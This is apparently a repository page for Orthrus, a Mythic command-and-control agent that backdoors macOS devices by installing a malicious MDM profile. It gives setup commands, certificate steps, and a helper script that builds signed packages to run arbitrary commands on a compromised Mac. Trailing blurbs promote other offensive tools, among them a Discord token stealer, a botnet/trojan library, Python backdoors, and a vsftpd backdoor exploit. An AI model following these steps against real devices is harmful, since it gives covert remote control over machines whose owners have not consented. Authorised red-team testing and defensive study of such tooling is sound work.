Orthrus is a macOS agent that uses Apple's MDM to backdoor a device using a malicious profile.

Overview

Orthrus Logo

Orthrus

Orthrus is a macOS agent that uses Apple's MDM to backdoor a device using a malicious profile. It effectively runs its own MDM server and allows the operator to interface with it using Mythic.

Talks & Publications

Installation

To install Orthrus, you'll need Mythic installed on a remote computer. You can find installation instructions for Mythic at the Mythic project page.

From the Mythic install root, run the command:

./mythic-cli install github https://github.com/MythicAgents/orthrus.git

Once installed, restart Mythic.

Orthrus uses Apple's Push Notification Service to send messages to the target device. For this reason, we need to configure APN push certificates. Some of the options for this can be found at Understanding MDM Certificates.

In my opinion, installing Server.app, setting up Profile Manager and then exporting the push cert from the keychain is the easiest way to do this. Full instructions for getting the APN certs in a more permanent way can be found here.

Instead of running the mdmctl mdmcert upload command manually, put the certificates in the C2_Profiles/mdm/certs/ folder, as apn.pem and apn.key.

Next, generate a SSL certificate for your MDM server.

DNSNAME=mdm.example.org;  (cat /etc/ssl/openssl.cnf ; printf "\n[SAN]\nsubjectAltName=DNS:$DNSNAME\n") | openssl req -new -newkey rsa:2048 -days 365 -nodes -x509 -sha256 -keyout mdm.key -out mdm.crt -subj "/CN=$DNSNAME" -reqexts SAN -extensions SAN -config /dev/stdin

Once created, base64 both the key and the certificate and put them in the config file using the Mythic UI for the MDM C2 Profile (Global Configurations -> C2 Profiles -> MDM -> Configure). Also set the mdm_host config item whilst you're here.

Restart the container.

./mythic-cli c2 start mdm

and you're good to go.

Notable Features

  • No custom code introduced to the device.
  • No beaconing behaviour, Orthrus will check in to Mythic when the operator tells it to using the force_callback command.
  • SSL certificate of the MDM server trusted for code signing upon installation.
  • Install PKG installers or Profiles.

Executing Packages

Signing

mdmclient will only execute packages that have been signed. If you do not use a signed package, it will silently fail. Usefully, the compromised device will install the TLS certificate of the MDM server (specified in the config) as a CA trusted for code sigining.

First, on an attacker box. Build a PFX file using the certificate and key from the MDM server.

openssl pkcs12 -export -out mdm.pfx -inkey mdm.key -in mdm.crt

Open the resulting pfx file to install it into the keychain.

The certificate can now be used as a signing identity.

pkg-cmd-helper

To automate the process of creating a signed package. I've put together a rough bash script to build packages that execute bash command, and subsequently sign them with an identity - pkg-cmd-helper.sh.

➜  ./pkg-cmd-helper.sh -h
Command line helper to generate pkg files that execute commands.
Author: @rookuu

Syntax: gen.sh -i com.malicious.pkg -o installme.pkg [-s 'My Signing Identity'] command
options:
-h     Print this Help.
-i     Identifier for the package.
-o     File name for the output package.
-s     (optional) Identity to use when signing the package.

➜  ./pkg-cmd-helper.sh -i com.rookuu.pkg -o example.pkg -s 192.168.0.5 mkdir /tmp/hacked
Building in /var/folders/fc/lc78954d3mnfvn4wbz8_20nc0000gn/T/tmp.mmsY0R6i
pkgbuild: Adding top-level preinstall script
pkgbuild: Wrote package to /var/folders/fc/lc78954d3mnfvn4wbz8_20nc0000gn/T/tmp.mmsY0R6i/temp.pkg
productbuild: Wrote product to /var/folders/fc/lc78954d3mnfvn4wbz8_20nc0000gn/T/tmp.mmsY0R6i/temp_dist.pkg
productsign: signing product with identity "192.168.0.5" from keychain /Library/Keychains/System.keychain
productsign: Wrote signed product archive to /var/folders/fc/lc78954d3mnfvn4wbz8_20nc0000gn/T/tmp.mmsY0R6i/temp_dist_signed.pkg
Done, see: example.pkg

Commands Manual Quick Reference

The commands available to us are dependent on the Apple MDM protocol, a full list of commands can be found on Apple's developer docs here.

General Commands

Command Syntax Description
force_callback force_callback Sends a push notification to the device, forcing it to checkin.
certificate_list certificate_list Lists installed certificates.
device_information device_information Returns general information about the device.
installed_applications installed_applications Lists installed applications.
profile_list profile_list Lists installed profiles.
provisioning_profile_list provisioning_profile_list Lists installed provisioning profiles.
security_info security_info Returns information about the security settings and features for the device.
install_profile install_profile Installs a mobile config file (upload using UI).
install_pkg install_pkg Installs a PKG installer file (upload using UI). Must be signed, see above.

Thanks

  • @its_a_feature_ for helping to troubleshoot all of the bugs in my code. :)
You might also like...
A quick script to spot the usage of Unicode Bidi (bidirectional) characters that could lead to an Invisible Backdoor
A quick script to spot the usage of Unicode Bidi (bidirectional) characters that could lead to an Invisible Backdoor

Invisible Backdoor Detector is a little Python script that allows you to spot and remove Bidi characters that could lead to an invisible backdoor. If you don't know what that is you should check the related paragraph.

The best Python Backdoor👌

Backdoor The best Python Backdoor Files Server file is used in all of cases If client is Windows, the client need execute EXE file If client is Linux,

Official implementation of the paper
Official implementation of the paper "Backdoor Attacks on Self-Supervised Learning".

SSL-Backdoor Abstract Large-scale unlabeled data has allowed recent progress in self-supervised learning methods that learn rich visual representation

pybotnet -   A Python Library for building Botnet , Trojan or BackDoor for windows and linux with Telegram control panel
pybotnet - A Python Library for building Botnet , Trojan or BackDoor for windows and linux with Telegram control panel

pybotnet A Python Library for building botnet , trojan or backdoor for windows and linux with Telegram control panel Disclaimer: Please note that this

Fat-Stealer is a stealer that allows you to grab the Discord token from a user and open a backdoor in his machine.
Fat-Stealer is a stealer that allows you to grab the Discord token from a user and open a backdoor in his machine.

Fat-Stealer is a stealer that allows you to grab the Discord token from a user and open a backdoor in his machine.

Files related to PoC||GTFO 21:21 - NSA’s Backdoor of the PX1000-Cr

Files related to PoC||GTFO 21:21 - NSA’s Backdoor of the PX1000-Cr 64bit2key.py

Transparent proxy server that works as a poor man's VPN. Forwards over ssh. Doesn't require admin. Works with Linux and MacOS. Supports DNS tunneling.

sshuttle: where transparent proxy meets VPN meets ssh As far as I know, sshuttle is the only program that solves the following common case: Your clien

macOS persistence tool
macOS persistence tool

PoisonApple Command-line tool to perform various persistence mechanism techniques on macOS. This tool was designed to be used by threat hunters for cy

macOS Initial Access Payload Generator

Mystikal macOS Initial Access Payload Generator Related Blog Post: https://posts.specterops.io/introducing-mystikal-4fbd2f7ae520 Usage: Install Xcode

Comments
  • replace APNS info

    replace APNS info

    Suggesting pointer to different wiki page for long-term handling. The current reference is now not available, feel free to message me (@sacrilicious on the twitters) or any of the micromdm people to discuss why

    opened by arubdesu 0
  • archliux and parrot os

    archliux and parrot os

    mdm issues

    Archlinux E: Release file for http://deb.debian.org/debian/dists/buster-updates/InRelease is not valid yet (invalid for another 7h 30min 54s). Updates for this repository will not be applied. 1 error occurred: * Status: The command '/bin/sh -c apt update && apt install -y unzip wget' returned a non-zero code: 100, Code: 100

    opened by sly9it 0
Owner
Mythic Agents
A centralized area for installable Mythic Agents based on https://github.com/its-a-feature/Mythic_External_Agent
Mythic Agents
Generate malicious files using recently published homoglyphic-attack (CVE-2021-42694)

CVE-2021-42694 Generate malicious files using recently published homoglyph-attack vulnerability, which was discovered at least in C, C++, C#, Go, Pyth

js-on 17 Dec 11, 2022
Generate malicious files using recently published bidi-attack (CVE-2021-42574)

CVE-2021-42574 - Code generator Generate malicious files using recently published bidi-attack vulnerability, which was discovered in Unicode Specifica

js-on 7 Nov 9, 2022
Aiminsun 165 Dec 21, 2022
Ingest GreyNoise.io malicious feed for CVE-2021-44228 and apply null routes

log4j-nullroute Quick script to ingest IP feed from greynoise.io for log4j (CVE-2021-44228) and null route bad addresses. Works w/Cisco IOS-XE and Ari

Ryan 5 Sep 12, 2022
Lnkbomb - Malicious shortcut generator for collecting NTLM hashes from insecure file shares

Lnkbomb Lnkbomb is used for uploading malicious shortcut files to insecure file

Joe Helle 216 Jan 8, 2023
Backdoor is a term that refers to the access of the software or hardware of a computer system without being detected.

This program is an non-object oriented opensource, hidden and undetectable backdoor/reverse shell/RAT for Windows made in Python 3 which contains many features such as multi-client support and cross-platform server.

null 35 Apr 17, 2022
This is an advanced backdoor, created with Python

Backdoor This is a Backdoor, created with Python 3. Types of Commands: Downloading / Uploading files. Launching / Deleting / Reading file's content. S

swagkarna 28 Oct 28, 2022
Lite version of my Gatekeeper backdoor for public use.

MayorSec Backdoor Fully functioning bind-type backdoor This backdoor is a fully functioning bind shell and lite version of my full functioning Gatekee

Joe Helle 56 Mar 25, 2022
A TCP Backdoor made in python

Tracey-Backdoor A Reverse Shell Backdoor made in python OOP. It supposed to work in Windows and Linux OS Functions: Reverse Connection Send Reverse TC

null 13 Oct 15, 2022
Python exploit for vsftpd 2.3.4 - Backdoor Command Execution

CVE-2011-2523 - vsftpd 2.3.4 Exploit Discription vsftpd, which stands for Very Secure FTP Daemon,is an FTP server for Unix-like systems, including Lin

Padsala Tushal 5 Nov 8, 2022